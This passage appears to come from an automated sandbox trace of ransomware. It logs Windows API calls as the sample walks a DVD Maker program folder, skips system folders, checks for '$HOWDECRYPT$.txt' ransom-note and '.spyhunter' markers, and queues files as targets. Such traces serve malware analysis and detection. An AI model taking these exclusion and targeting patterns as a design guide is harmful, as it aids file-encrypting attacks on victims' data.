lpString2="$HOWDECRYPT$.txt") returned 1 [0092.908] lstrcmpW (lpString1="Scenes_INTRO_BG_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_INTRO_BG_PAL.wmv") returned 76 [0092.908] GetProcessHeap () returned 0x2c0000 [0092.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x3780d8 [0092.909] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1500) returned 0x2c310e0 [0092.909] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.909] lstrcmpiW (lpString1="Scenes_LOOP_BG.wmv", lpString2="Windows") returned -1 [0092.909] lstrlenW (lpString="Windows") returned 7 [0092.909] lstrcmpiW (lpString1="Scenes_LOOP_BG.wmv", lpString2="$Recycle.bin") returned 1 [0092.909] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.909] lstrcmpiW (lpString1="Scenes_LOOP_BG.wmv", lpString2="System Volume Information") returned -1 [0092.909] lstrlenW (lpString="System Volume Information") returned 25 [0092.909] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv") returned 71 [0092.909] StrStrIW (lpFirst="Scenes_LOOP_BG.wmv", lpSrch=".spyhunter") returned 0x0 [0092.909] lstrcmpW (lpString1="Scenes_LOOP_BG.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.909] lstrcmpW (lpString1="Scenes_LOOP_BG.wmv", lpString2="_uninstalling_.png") returned 1 [0092.909] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG.wmv") returned 71 [0092.909] GetProcessHeap () returned 0x2c0000 [0092.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e560 [0092.909] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1508) returned 0x2c310e0 [0092.909] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.909] lstrcmpiW (lpString1="Scenes_LOOP_BG_PAL.wmv", lpString2="Windows") returned -1 [0092.909] lstrlenW (lpString="Windows") returned 7 [0092.909] lstrcmpiW (lpString1="Scenes_LOOP_BG_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.909] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.910] lstrcmpiW (lpString1="Scenes_LOOP_BG_PAL.wmv", lpString2="System Volume Information") returned -1 [0092.910] lstrlenW (lpString="System Volume Information") returned 25 [0092.910] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv") returned 75 [0092.910] StrStrIW (lpFirst="Scenes_LOOP_BG_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.910] lstrcmpW (lpString1="Scenes_LOOP_BG_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.910] lstrcmpW (lpString1="Scenes_LOOP_BG_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.910] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Scenes_LOOP_BG_PAL.wmv") returned 75 [0092.910] GetProcessHeap () returned 0x2c0000 [0092.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346728 [0092.910] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1510) returned 0x2c310e0 [0092.910] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.910] lstrcmpiW (lpString1="Title_Page_Ref.wmv", lpString2="Windows") returned -1 [0092.910] lstrlenW (lpString="Windows") returned 7 [0092.910] lstrcmpiW (lpString1="Title_Page_Ref.wmv", lpString2="$Recycle.bin") returned 1 [0092.910] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.910] lstrcmpiW (lpString1="Title_Page_Ref.wmv", lpString2="System Volume Information") returned 1 [0092.910] lstrlenW (lpString="System Volume Information") returned 25 [0092.910] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv") returned 71 [0092.910] StrStrIW (lpFirst="Title_Page_Ref.wmv", lpSrch=".spyhunter") returned 0x0 [0092.910] lstrcmpW (lpString1="Title_Page_Ref.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.910] lstrcmpW (lpString1="Title_Page_Ref.wmv", lpString2="_uninstalling_.png") returned 1 [0092.910] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref.wmv") returned 71 [0092.910] GetProcessHeap () returned 0x2c0000 [0092.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e200 [0092.911] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1518) returned 0x2c310e0 [0092.925] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.925] lstrcmpiW (lpString1="Title_Page_Ref_PAL.wmv", lpString2="Windows") returned -1 [0092.925] lstrlenW (lpString="Windows") returned 7 [0092.925] lstrcmpiW (lpString1="Title_Page_Ref_PAL.wmv", lpString2="$Recycle.bin") returned 1 [0092.925] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.925] lstrcmpiW (lpString1="Title_Page_Ref_PAL.wmv", lpString2="System Volume Information") returned 1 [0092.925] lstrlenW (lpString="System Volume Information") returned 25 [0092.925] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv") returned 75 [0092.925] StrStrIW (lpFirst="Title_Page_Ref_PAL.wmv", lpSrch=".spyhunter") returned 0x0 [0092.925] lstrcmpW (lpString1="Title_Page_Ref_PAL.wmv", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.926] lstrcmpW (lpString1="Title_Page_Ref_PAL.wmv", lpString2="_uninstalling_.png") returned 1 [0092.926] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Title_Page_Ref_PAL.wmv") returned 75 [0092.926] GetProcessHeap () returned 0x2c0000 [0092.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346aa8 [0092.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14b8) returned 0x2c310e0 [0092.926] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0092.926] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0092.927] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\$HOWDECRYPT$.txt") returned 69 [0092.927] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\$HOWDECRYPT$.txt") returned 69 [0092.927] GetProcessHeap () returned 0x2c0000 [0092.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x37e3b0 [0092.927] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14c0) returned 0x2c310e0 [0092.927] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.927] lstrcmpiW (lpString1="photoedge_buttongraphic.png", lpString2="Windows") returned -1 [0092.927] lstrlenW (lpString="Windows") returned 7 [0092.927] lstrcmpiW (lpString1="photoedge_buttongraphic.png", lpString2="$Recycle.bin") returned 1 [0092.927] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.927] lstrcmpiW (lpString1="photoedge_buttongraphic.png", lpString2="System Volume Information") returned -1 [0092.927] lstrlenW (lpString="System Volume Information") returned 25 [0092.927] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png") returned 75 [0092.927] StrStrIW (lpFirst="photoedge_buttongraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.927] lstrcmpW (lpString1="photoedge_buttongraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.927] lstrcmpW (lpString1="photoedge_buttongraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.927] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png") returned 75 [0092.927] GetProcessHeap () returned 0x2c0000 [0092.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346b88 [0092.927] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14c8) returned 0x2c310e0 [0092.928] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.928] lstrcmpiW (lpString1="photoedge_selectionsubpicture.png", lpString2="Windows") returned -1 [0092.928] lstrlenW (lpString="Windows") returned 7 [0092.928] lstrcmpiW (lpString1="photoedge_selectionsubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.928] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.928] lstrcmpiW (lpString1="photoedge_selectionsubpicture.png", lpString2="System Volume Information") returned -1 [0092.928] lstrlenW (lpString="System Volume Information") returned 25 [0092.928] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png") returned 81 [0092.928] StrStrIW (lpFirst="photoedge_selectionsubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.928] lstrcmpW (lpString1="photoedge_selectionsubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.928] lstrcmpW (lpString1="photoedge_selectionsubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.928] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png") returned 81 [0092.928] GetProcessHeap () returned 0x2c0000 [0092.928] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe4) returned 0x34f238 [0092.928] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d0) returned 0x2c310e0 [0092.928] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.928] lstrcmpiW (lpString1="photoedge_videoinset.png", lpString2="Windows") returned -1 [0092.928] lstrlenW (lpString="Windows") returned 7 [0092.928] lstrcmpiW (lpString1="photoedge_videoinset.png", lpString2="$Recycle.bin") returned 1 [0092.928] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.928] lstrcmpiW (lpString1="photoedge_videoinset.png", lpString2="System Volume Information") returned -1 [0092.928] lstrlenW (lpString="System Volume Information") returned 25 [0092.928] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png") returned 72 [0092.928] StrStrIW (lpFirst="photoedge_videoinset.png", lpSrch=".spyhunter") returned 0x0 [0092.929] lstrcmpW (lpString1="photoedge_videoinset.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.929] lstrcmpW (lpString1="photoedge_videoinset.png", lpString2="_uninstalling_.png") returned 1 [0092.929] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png") returned 72 [0092.929] GetProcessHeap () returned 0x2c0000 [0092.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x346728 [0092.929] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14d8) returned 0x2c310e0 [0092.929] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.929] lstrcmpiW (lpString1="Postage_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.929] lstrlenW (lpString="Windows") returned 7 [0092.929] lstrcmpiW (lpString1="Postage_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.929] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.929] lstrcmpiW (lpString1="Postage_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.929] lstrlenW (lpString="System Volume Information") returned 25 [0092.929] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png") returned 73 [0092.929] StrStrIW (lpFirst="Postage_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.929] lstrcmpW (lpString1="Postage_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.929] lstrcmpW (lpString1="Postage_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.929] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png") returned 73 [0092.929] GetProcessHeap () returned 0x2c0000 [0092.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd4) returned 0x346d48 [0092.929] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e0) returned 0x2c310e0 [0092.929] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.929] lstrcmpiW (lpString1="Postage_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.930] lstrlenW (lpString="Windows") returned 7 [0092.930] lstrcmpiW (lpString1="Postage_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.930] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.930] lstrcmpiW (lpString1="Postage_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.930] lstrlenW (lpString="System Volume Information") returned 25 [0092.930] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png") returned 79 [0092.930] StrStrIW (lpFirst="Postage_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.930] lstrcmpW (lpString1="Postage_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.930] lstrcmpW (lpString1="Postage_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.930] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png") returned 79 [0092.930] GetProcessHeap () returned 0x2c0000 [0092.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x377e20 [0092.930] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14e8) returned 0x2c310e0 [0092.930] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.930] lstrcmpiW (lpString1="Postage_VideoInset.png", lpString2="Windows") returned -1 [0092.930] lstrlenW (lpString="Windows") returned 7 [0092.930] lstrcmpiW (lpString1="Postage_VideoInset.png", lpString2="$Recycle.bin") returned 1 [0092.930] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.930] lstrcmpiW (lpString1="Postage_VideoInset.png", lpString2="System Volume Information") returned -1 [0092.930] lstrlenW (lpString="System Volume Information") returned 25 [0092.930] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png") returned 70 [0092.930] StrStrIW (lpFirst="Postage_VideoInset.png", lpSrch=".spyhunter") returned 0x0 [0092.930] lstrcmpW (lpString1="Postage_VideoInset.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.930] lstrcmpW (lpString1="Postage_VideoInset.png", lpString2="_uninstalling_.png") returned 1 [0092.930] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png") returned 70 [0092.931] GetProcessHeap () returned 0x2c0000 [0092.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e560 [0092.931] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f0) returned 0x2c310e0 [0092.931] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0092.931] lstrcmpiW (lpString1="Push", lpString2="Windows") returned -1 [0092.931] lstrlenW (lpString="Windows") returned 7 [0092.931] lstrcmpiW (lpString1="Push", lpString2="$Recycle.bin") returned 1 [0092.931] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.931] lstrcmpiW (lpString1="Push", lpString2="System Volume Information") returned -1 [0092.931] lstrlenW (lpString="System Volume Information") returned 25 [0092.931] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push") returned 52 [0092.931] lstrcmpW (lpString1="Push", lpString2=".") returned 1 [0092.931] lstrcmpW (lpString1="Push", lpString2="..") returned 1 [0092.931] GetProcessHeap () returned 0x2c0000 [0092.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c11050 [0092.931] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*") returned 54 [0092.931] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0092.933] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.933] lstrlenW (lpString="Windows") returned 7 [0092.933] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.933] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.933] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.933] lstrlenW (lpString="System Volume Information") returned 25 [0092.933] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\.") returned 54 [0092.933] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.933] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.933] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.933] lstrlenW (lpString="Windows") returned 7 [0092.933] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.934] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.934] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.934] lstrlenW (lpString="System Volume Information") returned 25 [0092.934] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\..") returned 55 [0092.934] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.934] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.934] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.934] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0092.934] lstrlenW (lpString="Windows") returned 7 [0092.934] lstrcmpiW (lpString1="1047x576black.png", lpString2="$Recycle.bin") returned 1 [0092.934] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.934] lstrcmpiW (lpString1="1047x576black.png", lpString2="System Volume Information") returned -1 [0092.934] lstrlenW (lpString="System Volume Information") returned 25 [0092.934] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png") returned 70 [0092.934] StrStrIW (lpFirst="1047x576black.png", lpSrch=".spyhunter") returned 0x0 [0092.934] lstrcmpW (lpString1="1047x576black.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.934] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0092.934] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png") returned 70 [0092.934] GetProcessHeap () returned 0x2c0000 [0092.934] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e200 [0092.934] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x14f8) returned 0x2c310e0 [0092.934] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.934] lstrcmpiW (lpString1="1047_576black.png", lpString2="Windows") returned -1 [0092.934] lstrlenW (lpString="Windows") returned 7 [0092.935] lstrcmpiW (lpString1="1047_576black.png", lpString2="$Recycle.bin") returned 1 [0092.935] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.935] lstrcmpiW (lpString1="1047_576black.png", lpString2="System Volume Information") returned -1 [0092.935] lstrlenW (lpString="System Volume Information") returned 25 [0092.935] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png") returned 70 [0092.935] StrStrIW (lpFirst="1047_576black.png", lpSrch=".spyhunter") returned 0x0 [0092.935] lstrcmpW (lpString1="1047_576black.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.935] lstrcmpW (lpString1="1047_576black.png", lpString2="_uninstalling_.png") returned 1 [0092.935] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png") returned 70 [0092.935] GetProcessHeap () returned 0x2c0000 [0092.935] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xce) returned 0x37e7e8 [0092.935] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1500) returned 0x2c310e0 [0092.935] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.935] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.935] lstrlenW (lpString="Windows") returned 7 [0092.935] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.935] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.935] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.935] lstrlenW (lpString="System Volume Information") returned 25 [0092.935] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png") returned 85 [0092.935] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.935] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.935] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.935] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png") returned 85 [0092.936] GetProcessHeap () returned 0x2c0000 [0092.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xec) returned 0x3555a0 [0092.936] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1508) returned 0x2c310e0 [0092.936] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.936] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.936] lstrlenW (lpString="Windows") returned 7 [0092.936] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.936] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.936] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.936] lstrlenW (lpString="System Volume Information") returned 25 [0092.936] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png") returned 91 [0092.936] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".spyhunter") returned 0x0 [0092.936] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.936] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0092.936] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png") returned 91 [0092.936] GetProcessHeap () returned 0x2c0000 [0092.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xf8) returned 0x35a160 [0092.936] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1510) returned 0x2c310e0 [0092.936] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.936] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0092.936] lstrlenW (lpString="Windows") returned 7 [0092.937] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$Recycle.bin") returned 1 [0092.937] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.937] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="System Volume Information") returned -1 [0092.937] lstrlenW (lpString="System Volume Information") returned 25 [0092.937] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png") returned 86 [0092.937] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".spyhunter") returned 0x0 [0092.937] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="$HOWDECRYPT$.txt") returned 1 [0092.937] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0092.937] lstrlenW (lpString="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png") returned 86 [0092.937] GetProcessHeap () returned 0x2c0000 [0092.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xee) returned 0x3553b0 [0092.937] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1518) returned 0x2c310e0 [0092.937] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0092.937] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0092.937] lstrlenW (lpString="Windows") returned 7 [0092.937] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="$Recycle.bin") returned 1 [0092.937] lstrlenW (lpString="$Recycle.bin") returned 12 [0092.937] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="System Volume Information") returned -1 [0092.937] lstrlenW (lpString="System Volume Information") returned 25 [0092.937] wnsprintfW (in: pszDest=0x2c11050, cchDest=32767, 